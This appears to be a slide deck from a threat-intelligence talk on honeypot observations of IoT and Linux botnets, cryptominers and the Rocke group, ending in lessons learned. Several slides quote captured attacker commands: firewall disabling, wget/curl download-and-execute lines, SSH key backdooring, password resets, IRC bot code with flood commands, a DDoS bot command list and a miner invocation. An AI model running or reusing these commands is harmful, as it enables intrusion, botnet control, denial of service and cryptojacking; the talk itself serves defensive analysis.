  • 20. 22 22 /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget - c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5 O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJ e0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPe cjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8h Gmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKg AySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst- path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,wri te
  • 21. 23 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircname]); my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z53'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Script command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt
  • 22. 24 24 if ($funcarg =~ /^flood/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); } if ($funcarg =~ /^utils/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help: sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== }
  • 23. 25 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non- spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * Source code of IRC based bot
  • 24. 26 26 Linux/Mirai – Fbot https://blog.malwaremustdie.org/2020/02/mmd-0065-2021- linuxmirai-fbot-re.html 2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab- 7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech’] 2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518’]
  • 25. 27 27
  • 27. 31 31 curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
  • 28. 32 32 Snippet of shell script if [ ! -f "4d867bd38706a5f7" ]; then ARCH=$(getconf LONG_BIT) if [ ${ARCH}x = "64x" ]; then (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7 ||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7 ||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7 ||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7 ||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7 ||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
  • 29. 33 33 Find hash related to URL serving Malware a5fba021a41c520a81647cda41110033eba 4f8842eb3239f227bcbb0b1b110d6
  • 30. 34 34
  • 31. 35 35 Rocke Gang 1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/ 24916 (May 2019) 2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box- mining-challengers (May 2019) 3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes- tactics-now-more-difficult-to-detect (Oct 2019) 4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to- evade-detection-by-cloud-security-products/ (Oct 2019)
  • 32. 36 36 www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaN R1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd Xi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
  • 33. 37 37 Analysis - Interesting indicators • IP addresses of host for initial access, run script to download binary/malware – Normally compromised systems • IP addresses of host serving binary/malware + other artefacts • IP addresses/domains of command and control • Binaries, scripts, malware samples, source code (+ hashes) • Ssh keys, webshells, Group names, irc #channels • Miner related information • Correlate with other observations, reports, etc
  • 35. 39 39 Lessons Learned • Context how can we “ improve” security ? • Bad Practices o Telnet enabled by default on devices o Weak or default credentials not removed o Services not developed securely o Services not deployed securely (i.e. management interfaces shouldn’t be exposed on the Internet) o No action upon notification (not our device, it is the customers) • Miscreants will exploit the weaknesess & monetize
  • 36. 45 45 Source IP from TO 2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21 AbuseIPDB
  • 37. 46 46 Back to the drawing Board? • Keeping the Internet safe and secure for _everyone_ • Education – Users, operators, developers • Governance – Incident Response – Roles and responsibilities – Accountabilities
  • 38. 48 Thank You! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696 https://www.unsplash.com/adliwahid